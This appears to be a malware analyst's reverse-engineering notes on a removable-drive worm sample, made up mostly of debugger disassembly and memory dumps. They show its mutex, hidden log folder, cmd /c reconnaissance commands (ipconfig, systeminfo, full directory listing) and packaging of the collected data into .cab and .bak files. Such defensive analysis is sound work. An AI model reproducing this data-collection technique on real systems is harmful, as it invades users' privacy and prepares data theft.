Driver.exe Analysis

MD5 = 894DF4FA5D934A9382ACFC20CB057F4D

Abstract : The sample given is a worm whose primary infection vector is removable drives. It has a given set of payloads including autostart preparation entries, user system info enumeration and logging; .cab file creation for payload backups for ostensible transfer and exploit documents dropped from embedded encrypted code. These document files further download other malware to the infected system. This particular variant requires commandline arguments indicating it is part of another triggering agent.

Static and Dynamic analysis : The sections below depict the flow of control in the malware code.

1. Selection of commandline arguments : passing ‘–e’ does most of the “execution”

00407F8F 9>NOP

00407F90 /$ 5>PUSH ECX

00407F91 |. 8>LEA EAX,DWORD PTR SS:[ESP]

00407F95 |. 5>PUSH ESI

00407F96 |. 5>PUSH EAX ; /pArgc

00407F97 |. F>CALL DWORD PTR DS:[<&KERNEL32.GetCommandLine>; |[GetCommandLineW

Generic str cmp :

00407FE6 |. E>CALL driver.00413E5E ; STR CMP

Code for -e argument comparison :

00408014 |. 6>PUSH driver.004255DC ; UNICODE “-e”

00408019 |. 5>PUSH ECX

0040801A |. E>CALL driver.00413E5E : STR CMP with cmd args -e

; cdecl func

0040801F |. 8>ADD ESP,8 ; 2 arguments

00408022 |. 8>TEST EAX,EAX ; if eax==0, then then succesful

00408024 |. 7>JNZ SHORT driver.0040805C ; follow through if zero flag is set

00408026 |. E>CALL driver.0040C1F0

2. Explore.exe process is started along with a mutex named ‘fuwa’.

0040C1F0 /$ 8>SUB ESP,56C

0040C1F6 |. 5>PUSH EBP

0040C1F7 |. 8>LEA EAX,DWORD PTR SS:[ESP+368]

0040C1FE |. 6>PUSH 104 ; /BufSize = 104 (260.)

0040C203 |. 5>PUSH EAX ; |PathBuffer

0040C204 |. 6>PUSH 0 ; |hModule = NULL

0040C206 |. F>CALL DWORD PTR DS:[<&KERNEL32.GetModuleFileN>; \GetModuleFileNameA

0040C20C |. 8>MOV CL,BYTE PTR SS:[ESP+368]

0040C213 |. 8>MOV DL,BYTE PTR SS:[ESP+369]

0040C21A |. 6>PUSH 5 ; /IsShown = 5

0040C21C |. 6>PUSH 0 ; |DefDir = NULL

0040C21E |. 8>LEA EAX,DWORD PTR SS:[ESP+C] ; |

0040C222 |. 6>PUSH 0 ; |Parameters = NULL

0040C224 |. 5>PUSH EAX ; |FileName

0040C225 |. 6>PUSH driver.00426360 ; |Operation = “explore”

0040C22A |. 6>PUSH 0 ; |hWnd = NULL

0040C22C |. 8>MOV BYTE PTR SS:[ESP+1C],CL ; |

0040C230 |. 8>MOV BYTE PTR SS:[ESP+1D],DL ; |

0040C234 |. C>MOV BYTE PTR SS:[ESP+1E],0 ; |

0040C239 |. F>CALL DWORD PTR DS:[<&SHELL32.ShellExecuteA>] ; \ShellExecuteA

0040C23F |. 6>PUSH driver.004262E8 ; /MutexName = “fuwa”

0040C244 |. 6>PUSH 1 ; |InitialOwner = TRUE

0040C246 |. 6>PUSH 0 ; |pSecurity = NULL

0040C248 |. F>CALL DWORD PTR DS:[<&KERNEL32.CreateMutexA>] ; \CreateMutexA

0040C24E |. 8>MOV EBP,EAX

0040C250 |. F>CALL DWORD PTR DS:[<&KERNEL32.GetLastError>] ; [GetLastError

0040C256 |. 3>CMP EAX,0B7

0040C25B |. 7>JNZ SHORT driver.0040C267

0040C25D |. 3>XOR EAX,EAX

0040C25F |. 5>POP EBP

0040C260 |. 8>ADD ESP,56C

0040C266 |. C>RETN

Stack View :

0012F9> 00000000 |hWnd = NULL

0012F9> 00426360 |Operation = “explore”

0012F9> 0012F9C0 |FileName = “C:”

0012F9> 00000000 |Parameters = NULL

0012F9> 00000000 |DefDir = NULL

0012F9> 00000005 \IsShown = 5

3. An unreachable code address is located at 0040A800. This is accessed during runtime to create a suspended thread and resume it to execute that partuicular malcode.

Creates a thread from the unreachaeble section :

0040BE95 . 6A 04 PUSH 4 ; |CreationFlags = CREATE_SUSPENDED

0040BE97 . 53 PUSH EBX ; |pThreadParm

0040BE98 . 68 00A84000 PUSH svchost.0040A800 ; |ThreadFunction = svchost.0040A800

0040BE9D . 53 PUSH EBX ; |StackSize

Creates a new thread taking code from this address :

0040A800 . 55 PUSH EBP

0040A801 . 8BEC MOV EBP,ESP

0040A803 . 6A FF PUSH -1

0040A805 . 68 A0FE4100 PUSH svchost.0041FEA0 ; SE handler installation

0040A80A . 64:A1 00000000 MOV EAX,DWORD PTR FS:[0]

0040A810 . 50 PUSH EAX

0040A811 . 64:8925 000000>MOV DWORD PTR FS:[0],ESP

0040A818 . 51 PUSH ECX

0040A819 . 53 PUSH EBX

0040A81A . 56 PUSH ESI

0040A81B . 57 PUSH EDI

0040A81C . 8965 F0 MOV DWORD PTR SS:[EBP-10],ESP

0040A81F . 33F6 XOR ESI,ESI

0040A821 > 8975 FC MOV DWORD PTR SS:[EBP-4],ESI

0040A824 . 3935 20A74200 CMP DWORD PTR DS:[42A720],ESI

0040A82A . 75 46 JNZ SHORT svchost.0040A872

0040A82C . C705 20A74200 >MOV DWORD PTR DS:[42A720],1

0040A836 . E8 D5450000 CALL svchost.0040EE10

0040A83B . 8935 20A74200 MOV DWORD PTR DS:[42A720],ESI

0040A841 . 68 E0930400 PUSH 493E0 ; /Timeout = 300000. ms

0040A846 . FF15 54104200 CALL DWORD PTR DS:[<&KERNEL32.Sleep>] ; \Sleep

0040A84C . C745 FC FFFFFF>MOV DWORD PTR SS:[EBP-4],-1

0040A853 .^EB CC JMP SHORT svchost.0040A821

0040A855 . C705 20A74200 >MOV DWORD PTR DS:[42A720],0

0040A85F . 68 60EA0000 PUSH 0EA60 ; /Timeout = 60000. ms

0040A864 . FF15 54104200 CALL DWORD PTR DS:[<&KERNEL32.Sleep>] ; \Sleep

0040A86A . B8 70A84000 MOV EAX,svchost.0040A870

0040A86F . C3 RETN

0040A870 . 33F6 XOR ESI,ESI

0040A872 > C745 FC FFFFFF>MOV DWORD PTR SS:[EBP-4],-1

0040A879 .^EB A6 JMP SHORT svchost.0040A821

clip_image002

4. We get to :

0040EEBC |. 8D8C24 C801000>LEA ECX,DWORD PTR SS:[ESP+1C8]

0040EEC3 |. 50 PUSH EAX ; /pTotalNumberOfFreeBytes

0040EEC4 |. 8D9424 D401000>LEA EDX,DWORD PTR SS:[ESP+1D4] ; |

0040EECB |. 51 PUSH ECX ; |pTotalNumberOfBytes

0040EECC |. 8D4424 64 LEA EAX,DWORD PTR SS:[ESP+64] ; |

0040EED0 |. 52 PUSH EDX ; |pFreeBytesAvailableToCaller

0040EED1 |. 50 PUSH EAX ; |DirectoryName

0040EED2 |. C64424 54 00 MOV BYTE PTR SS:[ESP+54],0 ; |

0040EED7 |. 66:896C24 55 MOV WORD PTR SS:[ESP+55],BP ; |

0040EEDC |. 89AC24 8000000>MOV DWORD PTR SS:[ESP+80],EBP ; |

0040EEE3 |. 896C24 74 MOV DWORD PTR SS:[ESP+74],EBP ; |

0040EEE7 |. C78424 8C00000>MOV DWORD PTR SS:[ESP+8C],104 ; |

0040EEF2 |. FF15 40104200 CALL DWORD PTR DS:[<&KERNEL32.GetDiskFre>; \GetDiskFreeSpaceExA

Stack :

009BF850 009BF8BC |DirectoryName = “C:\”

009BF854 009BFA30 |pFreeBytesAvailableToCaller = 009BFA30

009BF858 009BFA28 |pTotalNumberOfBytes = 009BFA28

009BF85C 009BF8F0 \pTotalNumberOfFreeBytes = 009BF8F0

Further , the code below is self explantory –

0040EFBE |. 68 10A34200 PUSH svchost.0042A310 ; ASCII “C:\WINDOWS\log”

0040EFC3 |. E8 5E500000 CALL svchost.00414026

0040EFC8 |. 83C4 08 ADD ESP,8

0040EFCB |. 83F8 FF CMP EAX,-1

0040EFCE |. 75 19 JNZ SHORT svchost.0040EFE9

0040EFD0 |. 55 PUSH EBP ; /pSecurity

0040EFD1 |. 68 10A34200 PUSH svchost.0042A310 ; |Path = “C:\WINDOWS\log”

0040EFD6 |. FF15 3C104200 CALL DWORD PTR DS:[<&KERNEL32.CreateDire>; \CreateDirectoryA

0040EFDC |. 6A 06 PUSH 6 ; /FileAttributes = HIDDEN|SYSTEM

0040EFDE |. 68 10A34200 PUSH svchost.0042A310 ; |FileName = “C:\WINDOWS\log”

0040EFE3 |. FF15 E4104200 CALL DWORD PTR DS:[<&KERNEL32.SetFileAtt>; \SetFileAttributesA

0040EFE9 |> 8D4C24 10 LEA ECX,DWORD PTR SS:[ESP+10]

0040EFED |. 51 PUSH ECX ; /pLocaltime

0040EFEE |. FF15 48104200 CALL DWORD PTR DS:[<&KERNEL32.GetLocalTi>; \GetLocalTime

0040EFF4 |. 8D5424 74 LEA EDX,DWORD PTR SS:[ESP+74]

0040EFF8 |. 8D4424 10 LEA EAX,DWORD PTR SS:[ESP+10]

0040EFFC |. 52 PUSH EDX ; /pFileTime

0040EFFD |. 50 PUSH EAX ; |pSystemTime

0040EFFE |. FF15 4C104200 CALL DWORD PTR DS:[<&KERNEL32.SystemTime>; \SystemTimeToFileTime

0040F004 |. B9 41000000 MOV ECX,41

0040F009 |. 33C0 XOR EAX,EAX

0040F00B |. 8DBC24 A800000>LEA EDI,DWORD PTR SS:[ESP+A8]

0040F012 |. 8D9424 A800000>LEA EDX,DWORD PTR SS:[ESP+A8]

0040F019 |. F3:AB REP STOS DWORD PTR ES:[EDI]

0040F01B |. 8B4C24 10 MOV ECX,DWORD PTR SS:[ESP+10]

0040F01F |. 81E1 FFFF0000 AND ECX,0FFFF

0040F025 |. 51 PUSH ECX

0040F026 |. 68 10A34200 PUSH svchost.0042A310 ; ASCII “C:\WINDOWS\log”

0040F02B |. 68 FC654200 PUSH svchost.004265FC ; ASCII “%s\%d”

0040F030 |. 52 PUSH EDX

5. Cab file preparation begins in this region :

0040F163 |. 68 E0654200 PUSH svchost.004265E0 ; ASCII “%s%d.cab”

0040F168 |. EB 13 JMP SHORT svchost.0040F17D

0040F16A |> 25 FFFF0000 AND EAX,0FFFF

0040F16F |. 8D8C24 A800000>LEA ECX,DWORD PTR SS:[ESP+A8]

0040F176 |. 50 PUSH EAX

0040F177 |. 51 PUSH ECX

0040F178 |. 68 D4654200 PUSH svchost.004265D4 ; ASCII “%s0%d.cab”

0040F17D |> 8D9424 B400000>LEA EDX,DWORD PTR SS:[ESP+B4]

0040F184 |. 52 PUSH EDX

0040F185 |. E8 16410000 CALL svchost.004132A0

0040F18A |. B9 41000000 MOV ECX,41

0040F18F |. 33C0 XOR EAX,EAX

0040F191 |. 8DBC24 2402000>LEA EDI,DWORD PTR SS:[ESP+224]

0040F198 |. 83C4 10 ADD ESP,10

0040F19B |. F3:AB REP STOS DWORD PTR ES:[EDI]

0040F19D |. 8D8424 1402000>LEA EAX,DWORD PTR SS:[ESP+214]

0040F1A4 |. 50 PUSH EAX ; /Buffer

009BC040 DC BF 9B 00 00 00 00 00 Ü¿›…..

009BC048 74 C8 9B 00 74 68 25 7D tÈ›.th%}

009BC050 38 34 22 7D FF FF FF FF 84″}ÿÿÿÿ

009BC058 F0 47 23 7D DC 25 23 7D ðG#}Ü%#}

009BC060 F0 C0 9B 00 D0 52 15 00 ðÀ›.ÐR.

009BC068 00 00 00 00 34 00 00 C0 ….4..À

009BC070 A0 C0 9B 00 6C FB 90 7C  À›.lû|

009BC078 71 FB 90 7C 34 00 00 C0 qû|4..À

009BC080 00 00 00 00 D0 52 15 00 ….ÐR.

009BC088 7C C0 9B 00 00 00 00 00 |À›…..

009BC090 74 C8 9B 00 18 EE 90 7C tÈ›.î|

009BC098 34 00 00 C0 02 00 00 00 4..À…

009BC0A0 B0 C0 9B 00 92 93 80 7C °À›.’“€|

009BC0A8 02 00 00 00 00 00 00 00 …….

009BC0B0 1C C1 9B 00 A7 B6 80 7C Á›.§¶€|

009BC0B8 34 00 00 C0 64 C4 9B 00 4..ÀdÄ›.

009BC0C0 D2 D5 FA 7F 0A 00 00 00 ÒÕú….

009BC0C8 14 C1 9B 00 F8 EB FD 7F Á›.øëý

009BC0D0 00 00 00 00 FC C0 9B 00 ….üÀ›.

009BC0D8 AA F0 90 7C 00 EC FD 7F ªð|.ìý

009BC0E0 62 00 00 00 08 C1 9B 00 b…Á›.

009BC0E8 60 C3 9B 00 31 00 00 00 `Û.1…

009BC0F0 18 00 00 00 00 00 00 00 …….

009BC0F8 14 C1 9B 00 40 00 00 00 Á›.@…

for :

004018DA |. 2BF9 SUB EDI,ECX

004018DC |. 897424 10 MOV DWORD PTR SS:[ESP+10],ESI

004018E0 |. 8BC1 MOV EAX,ECX

004018E2 |. 8BF7 MOV ESI,EDI

009BC038 34 00 00 C0 00 00 00 00 4..À….

009BC040 32 30 31 31 31 31 31 38 20111118

009BC048 31 33 35 35 31 35 2E 63 135515.c

009BC050 38 34 22 7D FF FF FF FF 84″}ÿÿÿÿ

009BC058 F0 47 23 7D DC 25 ðG#}Ü%

Copyies tha cab file name .

Tracing we get to : DUMP AT FIRST FCI CREATE API CALL :

clip_image004

clip_image006

ERROR Structure MEM ::

009BF320 1C F1 9B 00 00 00 00 00 ñ›…..

009BF328 AC F3 9B 00 43 3A 5C 57 ¬ó›.C:\W

009BF330 49 4E 44 4F 57 53 5C 6C INDOWS\l

009BF338 6F 67 5C 00 BC F3 9B 00 og\.¼ó›.

009BF340 A2 D8 96 7C 08 06 14 00 ¢Ø–|.

009BF348 86 D8 96 7C 00 00 14 00 †Ø–|…

009BF350 00 00 00 00 00 00 14 00 …….

009BF358 92 00 00 00 5C 00 44 00 ’…\.D.

009BF360 65 00 76 00 69 00 63 00 e.v.i.c.

009BF368 65 00 5C 00 48 00 61 00 e.\.H.a.

009BF370 72 00 64 00 64 00 69 00 r.d.d.i.

009BF378 73 00 6B 00 56 00 6F 00 s.k.V.o.

009BF380 6C 00 75 00 68 33 14 00 l.u.h3.

009BF388 48 31 14 00 28 02 00 00 H1.(..

009BF390 00 00 14 00 62 00 6F 00 …b.o.

Parameters to FCI CREATE :

009BF2D4 009BF320

009BF2D8 004016B0 driver.004016B0

009BF2DC 004015F0 driver.004015F0

009BF2E0 00401600 driver.00401600

009BF2E4 00401610 driver.00401610

009BF2E8 00401630 driver.00401630

009BF2EC 00401650 driver.00401650

009BF2F0 00401670 driver.00401670

009BF2F4 00401680 driver.00401680

009BF2F8 004016A0 driver.004016A0

009BF2FC 004016C0 driver.004016C0

009BF300 009BF430

RETURNS NON NULL VALUE : CHK SCREENSHOT :

NEXT at 40F1FE:

0040F1F8 |. 5>PUSH EDX ; /Arg1

0040F1F9 |. E>CALL driver.00401840 ; \ FCI CREATE

0040F1FE |. 6>PUSH driver.00425CBC ; ASCII “ab+”

0040F203 |. 6>PUSH driver.0042A518 ; ASCII “C:\WINDOWS\drive.ini”

0040F208 |. E>CALL driver.00414013

0040F20D |. 8>MOV EDI,EAX

6. We get to the cmd/c routines which are manipulated during runtime by the analyst to set the time constraints.

CALL TO cmd /c payloads :

0040F426 |. 5>PUSH EDX ; /pFileTime

0040F427 |. 5>PUSH EAX ; |pSystemTime

0040F428 |. F>CALL DWORD PTR DS:[<&KERNEL32.SystemTi>; \SystemTimeToFileTime

0040F42E |. 8>LEA ECX,DWORD PTR SS:[ESP+214]

0040F435 |. 5>PUSH ECX

0040F436 |. E>CALL driver.0040EBC0 ; call cmd /c function

0040F43B |. 8>LEA EDX,DWORD PTR SS:[ESP+218]

0040F442 |. 5>PUSH EBP

0040F443 |. 5>PUSH EDX

0040EC18 |. 5>PUSH EDX ; /pProcessInfo

0040EC19 |. 8>MOV DWORD PTR SS:[ESP+1C],ECX ; |

0040EC1D |. 5>PUSH EAX ; |pStartupInfo

0040EC1E |. 8>MOV EBP,DWORD PTR DS:[<&KERNEL32.Creat>; |kernel32.CreateProcessA

0040EC24 |. 5>PUSH EBX ; |CurrentDir

0040EC25 |. 8>MOV DWORD PTR SS:[ESP+28],ECX ; |

0040EC29 |. 5>PUSH EBX ; |pEnvironment

0040EC2A |. 6>PUSH 20 ; |CreationFlags = NORMAL_PRIORITY_CLASS

0040EC2C |. 8>MOV DWORD PTR SS:[ESP+34],ECX ; |

0040EC30 |. 5>PUSH EBX ; |InheritHandles

0040EC31 |. 5>PUSH EBX ; |pThreadSecurity

0040EC32 |. 8>LEA ECX,DWORD PTR SS:[ESP+84] ; |

0040EC39 |. 5>PUSH EBX ; |pProcessSecurity

0040EC3A |. 5>PUSH ECX ; |CommandLine

0040EC3B |. 5>PUSH EBX ; |ModuleFileName

0040EC3C |. C>MOV DWORD PTR SS:[ESP+4C],44 ; |

0040EC44 |. C>MOV DWORD PTR SS:[ESP+78],1 ; |

0040EC4C |. 6>MOV WORD PTR SS:[ESP+7C],BX ; |

0040EC51 |. F>CALL EBP ; \CreateProcessA

009BF6C4 00000000

009BF6C8 009BF754 ASCII “cmd /c ipconfig /all >> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\alldetails.txt”

009BF6CC 00000000

009BF6D0 00000000

TOCHK LATER :

0040EC79 |. 5>PUSH EAX

0040EC7A |. E>CALL driver.004132A0

009BF6E0 009BF754 ASCII “cmd /c systeminfo >> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\alldetails.txt”

009BF6DC 009BF754 ASCII “cmd /c dir C:\ /s >> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\alldetails.txt”

Edited to save time :

009BF6C8 009BF754 ASCII “cmd /c ver C:\ /s >> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\alldetails.txt”

009BF6CC 00000000

0040EDCF |. C>MOV DWORD PTR SS:[ESP+4C],44

0040EDD7 |. C>MOV DWORD PTR SS:[ESP+78],1

0040EDDF |. F>CALL EBP ; kernel32.CreateProcessA ; calls above edited sequence

eax modified to finalize at z : drive to save scanning time : eax = 0000005A

0040EDE5 |. 6>PUSH -1

0040EDE7 |. 5>PUSH ECX

0040EDE8 |. F>CALL EBX

0040EDEA |. 8>MOV AL,BYTE PTR SS:[ESP+10]

0040EDEE |. F>INC AL

0040EDF0 |. 3>CMP AL,5A

0040EDF2 |. 8>MOV BYTE PTR SS:[ESP+10],AL

0040EDF6 |.^0>JL driver.0040ED6D

The above code iterates through the whole drive base from root to z:

Once alldetails.tx is enumerated, it is fedthrough the following function :

0040F45B |. 8>LEA ECX,DWORD PTR SS:[ESP+54]

0040F45F |. 5>PUSH EAX ; /Arg1 = 009BFA74 ASCII “C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\alldetails.txt”

0040F460 |. E>CALL driver.00401A20 ; \CAB CALL !!!!!

0040F465 |. 8>LEA ECX,DWORD PTR SS:[ESP+54]

clip_image008

clip_image010

Cab files are created after the above call. A breakpoint can be placed on further sessions if cab file creation is to be seen, while saving time.

00401AF2 |. 5>PUSH EAX

00401AF3 |. E>CALL <JMP.&CABINET.FCIFlushCabinet>

00401AF8 |. 8>ADD ESP,10

00401AFB |. 8>TEST EAX,EAX

00401AFD |. 7>JNZ SHORT driver.00401B0F

00401AFF |. 8>MOV ECX,DWORD PTR DS:[ESI+4]

00401B02 |. 5>PUSH ECX

00401B03 |. E>CALL <JMP.&CABINET.FCIDestroy>

00401B08 |. 8>ADD ESP,4

00401B0B |. 3>XOR EAX,EAX

00401B0D |. 5>POP ESI

00401B0E |. C>RETN

00401B0F |> 8>MOV EDX,DWORD PTR DS:[ESI+4]

00401B12 |. 5>PUSH EDX

00401B13 |. E>CALL <JMP.&CABINET.FCIDestroy>

00401B18 |. 8>ADD ESP,4

00401B1B |. 5>POP ESI ; kernel32.WritePrivateProfileStringA

00401B1C \. C>RETN

At this point a working cab file is created in the filesystem.

7. We move to the .bak function :

The next part is about the .bak files :

0040DC40 /$ 6>MOV EAX,DWORD PTR FS:[0]

0040DC46 |. 6>PUSH -1

0040DC48 |. 8>MOV EDX,DWORD PTR SS:[ESP+8]

0040DC4C |. 6>PUSH driver.0042014B

0040DC51 |. 5>PUSH EAX

0040DC52 |. 6>MOV DWORD PTR FS:[0],ESP

0040DC59 |. 8>SUB ESP,268

0040DC5F |. 8>CMP EDX,driver.0042A2AC

0040DC65 |. 5>PUSH EBX

0040DC66 |. 5>PUSH EBP

0040DC67 |. 5>PUSH ESI

0040DC68 |. 5>PUSH EDI

0040DC69 |. 7>JNZ SHORT driver.0040DC72

0040DC6B |. 3>XOR EAX,EAX

0040DC6D |. E>JMP driver.0040DE0D

0040DC72 |> B>MOV ECX,40

0040DC77 |. 3>XOR EAX,EAX

0040DC79 |. 8>LEA EDI,DWORD PTR SS:[ESP+49]

0040DC7D |. C>MOV BYTE PTR SS:[ESP+48],0

0040DC82 |. F>REP STOS DWORD PTR ES:[EDI]

0040DC84 |. 6>STOS WORD PTR ES:[EDI]

0040DC86 |. 6>PUSH driver.00425CC4 ; ASCII “rb”

0040DC8B |. 5>PUSH EDX

0040DC8C |. A>STOS BYTE PTR ES:[EDI]

0040DC8D |. E>CALL driver.00414013

0040DC92 |. 8>MOV ESI,EAX

0040DC94 |. 8>ADD ESP,8

0040DC97 |. 8>TEST ESI,ESI

0040DC99 |. 0>JE driver.0040DE0D

0040DC9F |. 6>PUSH 2

0040DCA1 |. 6>PUSH 0

0040DCA3 |. 5>PUSH ESI

0040DCA4 |. E>CALL driver.0041406A

0040DCA9 |. 5>PUSH ESI

0040DCAA |. E>CALL driver.004142F8

0040DCAF |. 6>PUSH 0

0040DCB1 |. 6>PUSH 0

0040DCB3 |. 5>PUSH ESI

0040DCB4 |. 8>MOV EBP,EAX

0040DCB6 |. E>CALL driver.0041406A

0040DCBB |. 8>MOV EAX,EBP

0040DCBD |. 8>MOV EBX,EBP

0040DCBF |. 9>CDQ

0040DCC0 |. 8>AND EDX,0F

0040DCC3 |. 0>ADD EAX,EDX

0040DCC5 |. 8>MOV EDI,EAX

0040DCC7 |. C>SAR EDI,4

0040DCCA |. 8>AND EBX,8000000F

0040DCD0 |. 7>JNS SHORT driver.0040DCD7

0040DCD2 |. 4>DEC EBX

0040DCD3 |. 8>OR EBX,FFFFFFF0

0040DCD6 |. 4>INC EBX

0040DCD7 |> 8>MOV EAX,DWORD PTR SS:[ESP+2A4]

0040DCDE |. 8>LEA ECX,DWORD PTR SS:[ESP+64]

0040DCE2 |. 5>PUSH EAX

0040DCE3 |. 6>PUSH driver.004265C4 ; ASCII “%s.bak”

0040DCE8 |. 5>PUSH ECX

0040DCE9 |. E>CALL driver.004132A0

0040DCEE |. 8>LEA EDX,DWORD PTR SS:[ESP+70]

0040DCF2 |. 6>PUSH 0

0040DCF4 |. 5>PUSH EDX

0040DCF5 |. E>CALL driver.00414026

0040DCFA |. 8>ADD ESP,30

0040DCFD |. 8>TEST EAX,EAX

0040DCFF |. 7>JNZ SHORT driver.0040DD0C

0040DD01 |. 8>LEA EAX,DWORD PTR SS:[ESP+48]

0040DD05 |. 5>PUSH EAX ; /FileName

0040DD06 |. F>CALL DWORD PTR DS:[<&KERNEL32.DeleteFileA>] ; \DeleteFileA

0040DD0C |> 8>LEA ECX,DWORD PTR SS:[ESP+48]

0040DD10 |. 6>PUSH driver.004265C0 ; ASCII “wb”

0040DD15 |. 5>PUSH ECX

0040DD16 |. E>CALL driver.00414013

0040DD1B |. 8>MOV EBP,EAX

0040DD1D |. 8>ADD ESP,8

0040DD20 |. 8>TEST EBP,EBP

0040DD22 |. 7>JNZ SHORT driver.0040DD34

0040DD24 |. 5>PUSH ESI

0040DD25 |. E>CALL driver.00413E93

0040DD2A |. 8>ADD ESP,4

0040DD2D |. 3>XOR EAX,EAX

0040DD2F |. E>JMP driver.0040DE0D

0040DD34 |> 6>PUSH driver.004265AC

0040DD39 |. 6>PUSH 10

0040DD3B |. 8>LEA ECX,DWORD PTR SS:[ESP+154]

0040DD42 |. E>CALL driver.00401010

0040DD47 |. 8>TEST EDI,EDI

0040DD49 |. C>MOV DWORD PTR SS:[ESP+280],0

0040DD54 |. 7>JLE SHORT driver.0040DD93

0040DD56 |> 5>/PUSH ESI

0040DD57 |. 6>|PUSH 10

0040DD59 |. 8>|LEA EDX,DWORD PTR SS:[ESP+18]

0040DD5D |. 6>|PUSH 1

0040DD5F |. 5>|PUSH EDX

0040DD60 |. E>|CALL driver.0041414D

0040DD65 |. 8>|ADD ESP,10

0040DD68 |. 8>|LEA EAX,DWORD PTR SS:[ESP+2C]

0040DD6C |. 8>|LEA ECX,DWORD PTR SS:[ESP+10]

0040DD70 |. 5>|PUSH EAX

0040DD71 |. 5>|PUSH ECX

0040DD72 |. 8>|LEA ECX,DWORD PTR SS:[ESP+154]

0040DD79 |. E>|CALL driver.00401250

0040DD7E |. 5>|PUSH EBP

0040DD7F |. 6>|PUSH 10

0040DD81 |. 8>|LEA EDX,DWORD PTR SS:[ESP+34]

0040DD85 |. 6>|PUSH 1

0040DD87 |. 5>|PUSH EDX

0040DD88 |. E>|CALL driver.00413EE9

0040DD8D |. 8>|ADD ESP,10

0040DD90 |. 4>|DEC EDI

0040DD91 |.^7>\JNZ SHORT driver.0040DD56

0040DD93 |> 8>TEST EBX,EBX

0040DD95 |. 7>JE SHORT driver.0040DDE2

0040DD97 |. 3>XOR EAX,EAX

0040DD99 |. 5>PUSH ESI

0040DD9A |. 8>MOV DWORD PTR SS:[ESP+14],EAX

0040DD9E |. 5>PUSH EBX

0040DD9F |. 8>MOV DWORD PTR SS:[ESP+1C],EAX

0040DDA3 |. 8>LEA ECX,DWORD PTR SS:[ESP+18]

0040DDA7 |. 8>MOV DWORD PTR SS:[ESP+20],EAX

0040DDAB |. 6>PUSH 1

0040DDAD |. 5>PUSH ECX

0040DDAE |. 8>MOV DWORD PTR SS:[ESP+2C],EAX

0040DDB2 |. E>CALL driver.0041414D

0040DDB7 |. 8>ADD ESP,10

0040DDBA |. 8>LEA EDX,DWORD PTR SS:[ESP+2C]

0040DDBE |. 8>LEA EAX,DWORD PTR SS:[ESP+10]

0040DDC2 |. 8>LEA ECX,DWORD PTR SS:[ESP+14C]

0040DDC9 |. 5>PUSH EDX

0040DDCA |. 5>PUSH EAX

0040DDCB |. E>CALL driver.00401250

0040DDD0 |. 5>PUSH EBP

0040DDD1 |. 6>PUSH 10

0040DDD3 |. 8>LEA ECX,DWORD PTR SS:[ESP+34]

0040DDD7 |. 6>PUSH 1

0040DDD9 |. 5>PUSH ECX

0040DDDA |. E>CALL driver.00413EE9

0040DDDF |. 8>ADD ESP,10

0040DDE2 |> 5>PUSH ESI

0040DDE3 |. E>CALL driver.00413E93

0040DDE8 |. 5>PUSH EBP

0040DDE9 |. E>CALL driver.00413E93

0040DDEE |. 8>ADD ESP,8

0040DDF1 |. 8>LEA ECX,DWORD PTR SS:[ESP+14C]

0040DDF8 |. C>MOV DWORD PTR SS:[ESP+280],-1

0040DE03 |. E>CALL driver.00401000

0040DE08 |. B>MOV EAX,1

0040DE0D |> 8>MOV ECX,DWORD PTR SS:[ESP+278]

0040DE14 |. 5>POP EDI

0040DE15 |. 5>POP ESI

0040DE16 |. 5>POP EBP

0040DE17 |. 5>POP EBX

0040DE18 |. 6>MOV DWORD PTR FS:[0],ECX

0040DE1F |. 8>ADD ESP,274

0040DE25 \. C>RETN

Looking into it :

00413FFE |. F>PUSH DWORD PTR SS:[ESP+10]

00414002 |. F>PUSH DWORD PTR SS:[ESP+10]

00414006 |. F>PUSH DWORD PTR SS:[ESP+10]

0041400A |. E>CALL driver.00418425

009BF5A8 009BF908 ASCII “C:\WINDOWS\log\20111118154544.cab”

009BF5AC 00425CC4 ASCII “rb”

009BF5B0 00000040

AT :

00425CBD 62 2B 00 2A 2E 2A 00 72 b+.*.*.r

00425CC5 62 00 00 63 7C 77 7B F2 b..c|w{ò

Eax contains 62 :

004184F7 |> 8>|SUB EAX,62

004184FA |. 7>|JE SHORT driver.00418544

004184FC |. 4>|DEC EAX

sets at eax=40

Stack chk For EBP :

$ ==> 0>/009BF5A0

$+4 0>|00418569 RETURN to driver.00418569 from driver.004128E6

$+8 0>|009BF908 ASCII “C:\WINDOWS\log\20111118154544.cab”

$+C 0>|00008000

$+10 0>|00000040

$+14 0>|000001A4

$+18 0>|009BF720

$+1C 0>|7C822BB7 RETURN to kernel32.WritePrivateProfileStringA

$+20 0>|7C822A54 kernel32.GetPrivateProfileStringA

$+24 0>|00000000

$+28 0>|00000000

$+2C 0>0000000

009BF580 00428F90 driver.00428F90

009BF584 009BF641

009BF588 7FFFFFDA

009BF58C 009BF61C ASCII “C:\WINDOWS\log\20111118154544.cab.bak”

009BF590 00000042

004132C9 |. E>CALL driver.004165AD

004132CE |. 8>ADD ESP,0C

004132D1 |. F>DEC DWORD PTR SS:[EBP-1C]

004132D4 |. 8>MOV ESI,EAX

004132D6 |. 7>JS SHORT driver.004132E0

Proceeds to :

00413FFE |. F>PUSH DWORD PTR SS:[ESP+10]

00414002 |. F>PUSH DWORD PTR SS:[ESP+10]

00414006 |. F>PUSH DWORD PTR SS:[ESP+10]

0041400A |. E>CALL driver.00418425

00412A7F |> 6>PUSH 0 ; /hTemplateFile = NULL

00412A81 |. 5>PUSH ESI ; |Attributes

00412A82 |. F>PUSH DWORD PTR SS:[EBP-8] ; |Mode

00412A85 |. 8>LEA EAX,DWORD PTR SS:[EBP-1C] ; |

00412A88 |. 5>PUSH EAX ; |pSecurity

00412A89 |. F>PUSH DWORD PTR SS:[EBP-10] ; |ShareMode

00412A8C |. F>PUSH DWORD PTR SS:[EBP-C] ; |Access

00412A8F |. F>PUSH DWORD PTR SS:[EBP+8] ; |FileName

00412A92 |. F>CALL DWORD PTR DS:[<&KERNEL32.CreateFileA>] ; \CreateFileA

009BF530 009BF61C |FileName = “C:\WINDOWS\log\20111118154544.cab.bak”

009BF534 40000000 |Access = GENERIC_WRITE

009BF538 00000003 |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE

009BF53C 009BF558 |pSecurity = 009BF558

009BF540 00000002 |Mode = CREATE_ALWAYS

009BF544 00000080 |Attributes = NORMAL

009BF548 00000000 \hTemplateFile = NULL
